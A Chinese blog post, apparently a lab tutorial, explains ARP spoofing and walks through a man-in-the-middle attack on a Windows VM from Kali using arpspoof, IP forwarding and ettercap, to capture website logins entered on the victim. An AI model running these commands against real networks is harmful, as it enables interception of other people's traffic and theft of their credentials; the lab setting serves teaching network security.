ARP欺骗实验

ARP欺骗原理:

攻击者利用ARP工作的漏洞进行ARP欺骗

  • 1.主机A要和主机C网关通信,主机A发出ARP包询问谁是192.168.1.1?请回复192.168.1.2。
  • 2.这时主机B在疯狂的向主机A回复,我是192.168.1.1,并把自己的MAC地址发给主机A。
  • 3.由于ARP协议不会验证回复者的身份,造成主机A错误的将192.168.1.1的MAC映射为主机B的MAC地址。

实验环境

两个虚拟机都在同一网关下,

1.kali

        首先在kali中安装dsniff软件,若下载失败则需要修改Kali源网址的配置

apt-get update
apt-get install dsniff

┌──(root㉿kali)-[/]
└─# dsniff -version
dsniff: invalid option -- 'v'
Version: 2.4
Usage: dsniff [-cdmn] [-i interface | -p pcapfile] [-s snaplen]
              [-f services] [-t trigger[,...]] [-r|-w savefile]
              [expression]

        开启断口转发

┌──(root㉿kali)-[/]
└─# echo 1 > /proc/sys/net/ipv4/ip_forward 
                                                                             
┌──(root㉿kali)-[/]
└─# cat /proc/sys/net/ipv4/ip_forward      
1

2.windows 10(可以看见windows的IP地址和网关地址)

开始操作

1.进行欺骗

┌──(root㉿kali)-[/]
└─# arpspoof -i eth0 -t 192.168.127.137 192.168.127.2
0:c:29:48:e1:fb 0:c:29:18:4e:95 0806 42: arp reply 192.168.127.2 is-at 0:c:29:48:e1:fb
0:c:29:48:e1:fb 0:c:29:18:4e:95 0806 42: arp reply 192.168.127.2 is-at 0:c:29:48:e1:fb
0:c:29:48:e1:fb 0:c:29:18:4e:95 0806 42: arp reply 192.168.127.2 is-at 0:c:29:48:e1:fb
0:c:29:48:e1:fb 0:c:29:18:4e:95 0806 42: arp reply 192.168.127.2 is-at 0:c:29:48:e1:fb
0:c:29:48:e1:fb 0:c:29:18:4e:95 0806 42: arp reply 192.168.127.2 is-at 0:c:29:48:e1:fb
0:c:29:48:e1:fb 0:c:29:18:4e:95 0806 42: arp reply 192.168.127.2 is-at 0:c:29:48:e1:fb

可以看见kali给windows回复的MAC地址是它自己的MAC地址

2.再使用另一个抓包工具

┌──(root㉿kali)-[/]
└─# ettercap -i eth0 -Tq     

我们去windows上登录一个网站,然后输入账号和密码

然后去kali查看抓包结果,可以看见已经抓到了相应数据

相关推荐

最近更新

  1. TCP协议是安全的吗?

    2024-05-03 08:36:04       16 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-05-03 08:36:04       16 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-05-03 08:36:04       15 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-05-03 08:36:04       18 阅读

热门阅读

  1. Vue 3 Hooks: 深入理解 Composition API 的魅力

    2024-05-03 08:36:04       10 阅读
  2. selenium自动化,Chrome 启动参数

    2024-05-03 08:36:04       12 阅读
  3. docker 获取离线镜像包

    2024-05-03 08:36:04       12 阅读
  4. 深信服超融合部署Ubuntu22.04 LTS

    2024-05-03 08:36:04       14 阅读
  5. WPF之DataGrid表格,自定义表头、自定义单元格

    2024-05-03 08:36:04       11 阅读
  6. WPF —— 跑马灯

    2024-05-03 08:36:04       9 阅读
  7. C语言双向链表快速入门教程

    2024-05-03 08:36:04       13 阅读
  8. 【Godot4.2】EasyTreeData通用解析

    2024-05-03 08:36:04       7 阅读
  9. 数组作为参数和返回值

    2024-05-03 08:36:04       7 阅读